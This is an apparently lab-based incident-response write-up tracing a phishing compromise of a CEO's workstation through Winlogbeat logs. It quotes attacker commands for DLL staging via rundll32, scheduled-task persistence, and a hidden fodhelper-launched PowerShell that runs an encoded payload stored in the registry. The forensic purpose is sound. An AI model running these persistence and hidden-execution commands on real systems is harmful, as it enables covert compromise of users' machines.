Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.
The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.
Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.
Lastly, it was presumed by the security team that the incident occurred between August 29 and August 30, 2023.
Given the initial findings, you are tasked to analyse and assess the impact of the compromise.
First of all, after opening the Kibana head to discover and open the Winlogbeat index. That is the data the we need to analyze. Make sure the time range is the same as the incident time range.
Upon running the attachment mshta.exe is executed at August 29, 2023 23:51:16.738 and it invoke the xcopy.exe where it copy review.dat from Drive D to C:\Users\Evan~1.Hut(Even.Hutton)\Appdata\Local\Temp.
"C:\\Windows\\System32\\xcopy.exe" /s /i /e /h D:\\review.dat C:\\Users\\EVAN~1.HUT\\AppData\\Local\\Temp\\review.dat
At 23:51:16.771, rundll32.exe is executed to call the function DLLRegister inside D:\review.dat treating it like a legitimate DLL file (Defense evasion).
"C:\\Windows\\System32\\rundll32.exe" D:\\review.dat,DllRegisterServer
At 23:51:16.809 Powershell.exe is executed to create a schedule task name "Review" to run rundll32.exe which has an argument C:\Users\Evan~1.Hut\Appdata\Local\Temp\Review.dat,DLLregister. This will run every 6AM.
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" $A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\\Users\\EVAN~1.HUT\\AppData\\Local\\Temp\\review.dat,DllRegisterServer'; $T = New-ScheduledTaskTrigger -Daily -At 06:00; $S = New-ScheduledTaskSettingsSet; $P = New-ScheduledTaskPrincipal $env:username; $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S; Register-ScheduledTask Review -InputObject $D -Force;
At 23:51:47.608 There's a recon happening. As we can see below the parent process is from review.dat
At 23:54:49 It runs fodhelper.exe that executed a powershell command that reads an encoded script from registry and decodes and executes it invisibly. From registry it gets the value in .update and stores it in variable $x. The whatever the value in $x will executed quietly.
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x